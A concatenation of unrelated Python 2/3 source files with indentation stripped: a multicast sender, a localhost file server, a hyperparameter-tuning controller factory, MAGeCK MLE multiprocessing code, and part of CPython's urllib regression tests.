def send_message(message):
sock = cast_socket()
send_socket_message(sock, message, num_times)
sock.close()
def handle_background_message(message):
send_message(message)
thread = threading.current_thread()
background_threads.remove(thread)
ui.report_verbose("terminating thread: " + str(thread))
def send_background_message(message):
thread = threading.Thread(target=handle_background_message, args=(message, ))
ui.report_verbose("new thread: " + str(thread))
background_threads.append(thread)
thread.start()
def wait_for_active_threads():
if(len(background_threads) > 0):
ui.report_warn("waiting for active threads to terminate...")
for t in background_threads:
t.join()
############################################################################
############################################################################
#if __name__ == '__main__':
# setup()
# try:
# run()
# except KeyboardInterrupt:
# pass
# sys.exit("\nExiting...\n")
#
# finally:
# wait_for_active_threads()
# conclude()
# sys.exit("\nExiting...\n")
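# Illustrative usage sketch (assumed workflow, not part of the original file):
#
#   import multicast
#   multicast.begin('host-01', verbose_mode_=True)
#   multicast.broadcast('status?')
#   multicast.conclude()          # waits for background sender threads
#   print(multicast.received())   # {ip: response} gathered by the latest send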
|
FileServer.py
|
from SimpleHTTPServer import SimpleHTTPRequestHandler
from os.path import join
from SocketServer import TCPServer, ThreadingMixIn
import threading
HTTP_PORT = 14563
class CustomHandler(SimpleHTTPRequestHandler):
def log_message(self, format, *args):
pass
def translate_path(self, target):
target = target[1:] if target.startswith('/') else target
return join('javaws_app', target)
class FileServer(ThreadingMixIn, TCPServer):
allow_reuse_address = True
def __init__(self):
pass
def start(self):
TCPServer.__init__(self, ('localhost', int(HTTP_PORT)), CustomHandler)
server_thread = threading.Thread(target=self.serve_forever)
server_thread.daemon = True
server_thread.start()
def stop(self):
self.server_close()
print "Server stopped"
|
controller.py
|
import queue
import socket
import threading
import time
from manta_lab.tuning.internal.integrations import (
BayesianController,
ChocolateController,
HyperbandController,
HyperOptController,
OptunaController,
RayController,
SkOptController,
)
class ControllerFactory:
@staticmethod
def create(request):
name = request["algorithm"]["name"]
if name in ["tpe", "multivariate-tpe", "cmaes", "random"]:
return OptunaController()
elif name in ["bayesian"]:
return BayesianController()
elif name in ["choco-grid", "choco-random", "choco-quasirandom", "choco-bayesian", "choco-mocmaes"]:
return ChocolateController()
elif name in ["hyperband"]:
return HyperbandController()
elif name in ["hyperopt-tpe", "hyperopt-random"]:
return HyperOptController()
elif name in ["ray"]: # Too many integrations here. need to get algorithm name in other param
return RayController()
        elif name in []:  # placeholder: no SkOpt algorithm names wired up yet
return SkOptController()
else:
raise AttributeError("Wrong Algorithm name")
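# Illustrative example of the mapping above (the request shape follows the
# __main__ block at the bottom of this file):
#
#   ControllerFactory.create({"algorithm": {"name": "bayesian"}})
#   # -> BayesianController()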
# TODO: this will be refactored later
class ControllerSerivce:
def __init__(self, tune_id):
self._tune_id = tune_id
self._jobs = {}
self._queue = queue.Queue()
self._exit_flag = False
self._start_time = time.time()
self._controller_id = None
def _register_controller(self):
"""Tell server controller starts running.
tune_id, host, thread or process id
"""
controller = self._api.register_controller(host=socket.gethostname(), tune_id=self._tune_id, process_id=123)
self._controller_id = controller["id"]
def _setup(self, req):
self._register_controller()
self._controller = ControllerFactory.create(req)
def _thread_body(self):
while True:
if self._exit_flag:
return
requests = self._read_requests_from_queue()
for req in requests:
                jobs = self._controller.create_jobs(req)
self._publish_agent(jobs)
def _publish_agent(self, jobs):
pass
def _read_requests_from_queue(self):
return []
def run(self, req):
print("Starting tune controller: tune_id={}".format(self._tune_id))
self._setup(req)
self._thread_body()
# self._tuner_thread = threading.Thread(target=self._thread_body)
# self._tuner_thread.daemon = True
# self._tuner_thread.name = f"controller_thread({self._tune_id})"
# self._tuner_thread.start()
if __name__ == "__main__":
req = {
"algorithm": {
"name": "tpe",
"metric": {"name": "accuracy", "goal": "maximize"},
"settings": {"n_startup_trials": 1},
},
"parameters": {
"a": {"values": [1, 2, 3, 4]},
"b": {"type": "integer", "min": 0, "max": 10},
"c": {"type": "float", "min": -5, "max": 5},
"d": {"values": [1, 2, 3, 4]},
},
}
controller = ControllerFactory.create(req)
job = controller.create_jobs(req)
req2 = {
"previous_jobs": [
{
"id": job[0][0],
"metric": 10,
"parameters": job[0][1],
}
],
}
req2.update(req)
job2 = controller.create_jobs(req2)
controller.create_jobs(req)
|
mlemultiprocessing.py
|
'''
MAGeCK MLE multiprocessing
'''
from __future__ import print_function
import re
import sys
import logging
import multiprocessing
import copy
import numpy as np
from mageck.mleem import iteratenbem
# debug
try:
from IPython.core.debugger import Tracer
except:
pass
def thread_p_func(dinst,args,iteratenbemargs,returndict):
    '''
    Worker function for multiprocessing
    Parameters:
        dinst
            A dictionary of gene instances for this worker to process
        args
            Parsed command line arguments
        iteratenbemargs
            A dictionary of keyword arguments passed to the iteratenbem() function
        returndict
            A shared (Manager) dictionary used to return the processed instances
    '''
name = multiprocessing.current_process().name
ngene=0
logging.info(name+': total '+str(len(dinst))+ ' instances.')
for (tgid,tginst) in dinst.iteritems():
if ngene % 1000 ==1 or args.debug:
logging.info(name+': Calculating '+tgid+' ('+str(ngene)+') ... ')
iteratenbem(tginst,**iteratenbemargs)
returndict[tgid]=tginst
ngene+=1
def runem_multiproc(allgenedict,args,nproc=1, argsdict={}):
    '''
    Call iteratenbem() on all genes using the specified number of worker processes
    Arguments:
        allgenedict:
            a dictionary of all gene instances
        args:
            parsed command line arguments
        nproc
            The number of worker processes
        argsdict
            Keyword arguments passed to iteratenbem()
    '''
# separate dicts
instdictlist=[]
mnger=multiprocessing.Manager()
retdict=mnger.dict()
if nproc==1:
instdictlist.append(allgenedict)
elif nproc<=0:
logging.error('Error: incorrect number of threads.')
sys.exit(-1)
else:
ngene=0
instdictlist=[]
for i in range(nproc):
instdictlist.append({})
for (tgid,tginst) in allgenedict.iteritems():
targetlistid=ngene %nproc
instdictlist[targetlistid][tgid]=tginst
ngene+=1
# start jobs
jobs=[]
for i in range(nproc):
j=multiprocessing.Process(target=thread_p_func, name='Thread '+str(i),args=(instdictlist[i],args,argsdict,retdict))
jobs.append(j)
j.start()
logging.info(j.name+' started.')
for jj in jobs:
jj.join()
logging.info(jj.name+' completed.')
logging.info('All threads completed.')
# save the instance
# Tracer()()
for tgid in retdict.keys():
tginst=retdict[tgid]
allgenedict[tgid]=tginst
def iteratenbem_permutation(genedict,args,debug=True,nround=100,removeoutliers=False,size_factor=None):
'''
Perform permutation test
'''
logging.info('Start permuting '+str(nround)+' rounds ...')
allsg=[]
desmat=genedict[genedict.keys()[0]].design_mat
nbeta1=desmat.shape[1]-1
ngene=len(genedict)
for (geneid, geneinst) in genedict.iteritems():
nsg=geneinst.nb_count.shape[1]
nsample=geneinst.nb_count.shape[0]
countmat=geneinst.nb_count.getT()
sgitem=[(geneinst.w_estimate[i],countmat[i]) for i in range(nsg)]
allsg+=sgitem
logging.info('Collecting '+str(len(allsg))+' sgRNAs from '+str(ngene)+' genes.')
#
genedictcopy=copy.deepcopy(genedict)
betazeros=np.zeros((nround*ngene,nbeta1))
#
betaz_id=0
for nrd in range(nround):
np.random.shuffle(allsg)
#
logging.info('Permuting round '+str(nrd)+' ...')
nid=0
for (geneid, geneinst) in genedictcopy.iteritems():
nsg=geneinst.nb_count.shape[1]
nsample=geneinst.nb_count.shape[0]
selitem=allsg[nid:nid+nsg]
countmat=np.vstack([x[1] for x in selitem])
w_es=np.array([x[0] for x in selitem])
geneinst.nb_count=countmat.getT()
geneinst.w_estimate=w_es
nid+=nsg
# end gene loop
#iteratenbem(geneinst,debug=False,estimateeff=True,updateeff=False,removeoutliers=removeoutliers,size_factor=size_factor,logem=False)
argsdict={'debug':False,'estimateeff':True,'updateeff':False,'removeoutliers':removeoutliers,'size_factor':size_factor,'logem':False}
runem_multiproc(genedictcopy,args,nproc=args.threads,argsdict=argsdict)
for (geneid, geneinst) in genedictcopy.iteritems():
nsg=geneinst.nb_count.shape[1]
beta_es=geneinst.beta_estimate[nsg:]
betazeros[betaz_id,:]=beta_es
betaz_id+=1
# end gene loop
# end permutation
logging.info('Assigning p values...')
ncompare=betazeros.shape[0]*1.0
for (geneid, geneinst) in genedict.iteritems():
nsg=geneinst.nb_count.shape[1]
beta_es=geneinst.beta_estimate[nsg:]
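        # Empirical two-sided p-value: count permuted betas above and below the
        # observed beta, take the smaller tail fraction and double it.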
cp_u0=np.sum(betazeros>beta_es,axis=0)
cp_u1=np.sum(betazeros<beta_es,axis=0)
cp_ustack=np.vstack((cp_u0/ncompare,cp_u1/ncompare))
cp_minval=np.min(cp_ustack,axis=0)
#cp_minvec=np.array(cp_minval)[0]
cp_minvec=cp_minval*2
geneinst.beta_permute_pval=cp_minvec
geneinst.beta_permute_pval_neg=cp_ustack[1]
geneinst.beta_permute_pval_pos=cp_ustack[0]
# Tracer()()
return betazeros
|
test_urllib.py
|
"""Regression tests for urllib"""
import collections
import urllib
import httplib
import io
import unittest
import os
import sys
import mimetools
import tempfile
from test import test_support
from base64 import b64encode
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
def fakehttp(fakedata):
class FakeSocket(io.BytesIO):
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
return self
def read(self, amt=None):
if self.closed:
return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed:
return b""
return io.BytesIO.readline(self, length)
class FakeHTTPConnection(httplib.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = ""
def connect(self):
self.sock = FakeSocket(self.fakedata)
self.__class__.fakesock = self.sock
FakeHTTPConnection.fakedata = fakedata
return FakeHTTPConnection
class FakeHTTPMixin(object):
def fakehttp(self, fakedata):
assert httplib.HTTP._connection_class == httplib.HTTPConnection
httplib.HTTP._connection_class = fakehttp(fakedata)
def unfakehttp(self):
httplib.HTTP._connection_class = httplib.HTTPConnection
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
        # Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), mimetools.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertEqual(self.returned_obj.getcode(), None)
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.urlopen,'./' + self.pathname)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = test_support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in os.environ.keys():
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.getproxies_environment()
        # getproxies_environment uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with space.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com:1234')
self.assertTrue(urllib.proxy_bypass_environment('anotherdomain.com'))
self.assertTrue(urllib.proxy_bypass_environment('anotherdomain.com:8888'))
self.assertTrue(urllib.proxy_bypass_environment('newdomain.com:1234'))
def test_proxy_cgi_ignore(self):
try:
self.env.set('HTTP_PROXY', 'http://somewhere:3128')
proxies = urllib.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
self.env.set('REQUEST_METHOD', 'GET')
proxies = urllib.getproxies_environment()
self.assertNotIn('http', proxies)
finally:
self.env.unset('REQUEST_METHOD')
self.env.unset('HTTP_PROXY')
def test_proxy_bypass_environment_host_match(self):
bypass = urllib.proxy_bypass_environment
self.env.set('NO_PROXY',
'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t')
self.assertTrue(bypass('localhost'))
self.assertTrue(bypass('LocalHost')) # MixedCase
self.assertTrue(bypass('LOCALHOST')) # UPPERCASE
self.assertTrue(bypass('newdomain.com:1234'))
self.assertTrue(bypass('foo.d.o.t')) # issue 29142
self.assertTrue(bypass('anotherdomain.com:8888'))
self.assertTrue(bypass('www.newdomain.com:1234'))
self.assertFalse(bypass('prelocalhost'))
self.assertFalse(bypass('newdomain.com')) # no port
self.assertFalse(bypass('newdomain.com:1235')) # wrong port
class ProxyTests_withOrderedEnv(unittest.TestCase):
def setUp(self):
# We need to test conditions, where variable order _is_ significant
self._saved_env = os.environ
# Monkey patch os.environ, start with empty fake environment
os.environ = collections.OrderedDict()
def tearDown(self):
os.environ = self._saved_env
def test_getproxies_environment_prefer_lowercase(self):
# Test lowercase preference with removal
os.environ['no_proxy'] = ''
os.environ['No_Proxy'] = 'localhost'
self.assertFalse(urllib.proxy_bypass_environment('localhost'))
self.assertFalse(urllib.proxy_bypass_environment('arbitrary'))
os.environ['http_proxy'] = ''
os.environ['HTTP_PROXY'] = 'http://somewhere:3128'
proxies = urllib.getproxies_environment()
self.assertEqual({}, proxies)
# Test lowercase preference of proxy bypass and correct matching including ports
os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234'
os.environ['No_Proxy'] = 'xyz.com'
self.assertTrue(urllib.proxy_bypass_environment('localhost'))
self.assertTrue(urllib.proxy_bypass_environment('noproxy.com:5678'))
self.assertTrue(urllib.proxy_bypass_environment('my.proxy:1234'))
self.assertFalse(urllib.proxy_bypass_environment('my.proxy'))
self.assertFalse(urllib.proxy_bypass_environment('arbitrary'))
# Test lowercase preference with replacement
os.environ['http_proxy'] = 'http://somewhere:3128'
os.environ['Http_Proxy'] = 'http://somewhereelse:3128'
proxies = urllib.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urlopen() opening a fake http connection."""
def test_read(self):
self.fakehttp('Hello!')
try:
fp = urllib.urlopen("http://python.org/")
self.assertEqual(fp.readline(), 'Hello!')
self.assertEqual(fp.readline(), '')
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp('Hello!')
try:
fp = urllib.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp('''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urllib.urlopen, "http://python.org/")
finally:
self.unfakehttp()
@unittest.skipIf(sys.platform == 'cli', 'https://github.com/IronLanguages/main/issues/1626')
def test_invalid_redirect(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp("""HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file:README
Connection: close
Content-Type: text/html; charset=iso-8859-1
""")
try:
msg = "Redirection to url 'file:"
with self.assertRaisesRegexp(IOError, msg):
urllib.urlopen("http://python.org/")
finally:
self.unfakehttp()
def test_redirect_limit_independent(self):
# Ticket #12923: make sure independent requests each use their
# own retry limit.
for i in range(urllib.FancyURLopener().maxtries):
self.fakehttp(b'''HTTP/1.1 302 Found
Location: file://guidocomputer.athome.com:/python/license
Connection: close
''')
try:
self.assertRaises(IOError, urllib.urlopen,
"http://something")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp('')
try:
self.assertRaises(IOError, urllib.urlopen, 'http://something')
finally:
self.unfakehttp()
def test_missing_localfile(self):
self.assertRaises(IOError, urllib.urlopen,
'file://localhost/a/missing/file.py')
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
self.assertTrue(os.path.exists(tmp_file))
try:
fp = urllib.urlopen(tmp_fileurl)
fp.close()
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
self.assertRaises(IOError, urllib.urlopen, tmp_fileurl)
def test_ftp_nonexisting(self):
self.assertRaises(IOError, urllib.urlopen,
'ftp://localhost/not/existing/file.py')
def test_userpass_inurl(self):
self.fakehttp('Hello!')
try:
fakehttp_wrapper = httplib.HTTP._connection_class
fp = urllib.urlopen("http://user:pass@python.org/")
authorization = ("Authorization: Basic %s\r\n" %
b64encode('user:pass'))
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf)
self.assertEqual(fp.readline(), "Hello!")
self.assertEqual(fp.readline(), "")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_with_spaces_inurl(self):
self.fakehttp('Hello!')
try:
url = "http://a b:c d@python.org/"
fakehttp_wrapper = httplib.HTTP._connection_class
authorization = ("Authorization: Basic %s\r\n" %
b64encode('a b:c d'))
fp = urllib.urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf)
self.assertEqual(fp.readline(), "Hello!")
self.assertEqual(fp.readline(), "")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
        # this only helps to make sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(test_support.TESTFN)
self.text = 'testing urllib.urlretrieve'
try:
FILE = file(test_support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
def createNewTempFile(self, data=""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.urlretrieve("file:%s" % test_support.TESTFN)
self.assertEqual(result[0], test_support.TESTFN)
self.assertIsInstance(result[1], mimetools.Message,
"did not get a mimetools.Message instance as "
"second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.urlretrieve(self.constructLocalFileUrl(
test_support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = file(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assertIsInstance(count, int)
self.assertIsInstance(block_size, int)
self.assertIsInstance(total_size, int)
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % test_support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.urlretrieve(self.constructLocalFileUrl(test_support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 5)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile("x" * 8193)
urllib.urlretrieve(self.constructLocalFileUrl(srcFileName),
test_support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp('''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
try:
self.assertRaises(urllib.ContentTooShortError, urllib.urlretrieve,
'http://example.com', reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp('''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
try:
self.assertRaises(urllib.ContentTooShortError, urllib.urlretrieve, 'http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
    According to RFC 2396 ("Uniform Resource Identifiers"), to escape a
character you write it as '%' + <2 character US-ASCII hex value>. The Python
code of ``'%' + hex(ord(<character>))[2:]`` escapes a character properly.
Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %s != %s" % (do_not_quote, result))
result = urllib.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %s != %s" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.quote.func_defaults[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %s != %s" % (quote_by_default, result))
result = urllib.quote_plus(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %s != %s" %
(quote_by_default, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): %s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %s != %s" % (expected, result))
result = urllib.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %s != %s" % (expected, result))
self.assertRaises(TypeError, urllib.quote, None)
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %s != %s" % (result, hexescape(' ')))
result = urllib.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %s != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.quote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %s != %s" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the doc string for quoting_Tests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using quote(): not all characters escaped; %s" %
result)
result = urllib.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = '\xab\xea'
result = urllib.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when have non-quoted characters
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using quote(): %s != %s" % (expect, result))
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %s != %s" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %s != %s" % (expect, result))
def test_unquote_with_unicode(self):
r = urllib.unquote(u'br%C3%BCckner_sapporo_20050930.doc')
self.assertEqual(r, u'br\xc3\xbcckner_sapporo_20050930.doc')
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
Test cannot assume anything about order. Docs make no guarantee and
have possible dictionary input.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
